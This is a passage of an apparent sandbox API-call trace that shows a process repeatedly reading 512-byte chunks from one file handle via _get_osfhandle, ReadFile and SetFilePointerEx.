dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.277] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.277] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.277] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.277] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.277] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.277] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.277] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.277] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.277] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.278] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.278] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.278] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.278] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.278] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, 
lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.278] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.278] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.278] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.278] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.278] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.278] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.278] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.278] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.278] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.278] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.278] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.278] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.278] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.278] _get_osfhandle (_FileHandle=4) returned 0x54 
[0094.278] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.278] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.279] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.279] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.279] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.279] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.279] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.279] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.279] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.279] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.279] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.279] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.279] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.279] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.279] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.279] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.279] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.279] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.279] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.279] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.279] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.279] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.279] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.279] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.279] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.280] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.280] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.280] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, 
lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.280] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.280] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.280] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.280] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.280] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.280] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.280] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.280] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.280] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.280] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.280] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.280] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.280] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.280] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0094.280] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.281] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.281] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.281] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.281] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.281] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.281] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.281] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.281] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.281] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.281] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.281] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.281] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 
[0094.281] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.281] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.281] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.281] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.281] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.281] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.281] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.281] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.281] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.281] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.282] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.282] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.282] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.282] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.282] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.282] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.282] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.282] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.282] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.282] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.282] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.282] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.282] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.282] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.282] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.282] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.282] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.282] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.282] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.282] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.282] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.282] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.283] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.283] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.283] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.283] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.283] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.283] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.283] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.283] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.283] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.283] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, 
lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.283] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.283] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.283] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.283] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.283] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.283] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.283] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.283] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.283] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.283] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.283] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.283] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.284] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.284] _get_osfhandle (_FileHandle=4) returned 0x54 
[0094.284] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.284] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.284] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.284] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.284] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.284] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.284] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.284] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.284] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.284] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.284] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.284] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.284] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.284] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.284] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.284] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.284] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.284] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.284] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.284] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.285] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.285] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.285] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.285] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.285] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.285] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.285] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.285] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, 
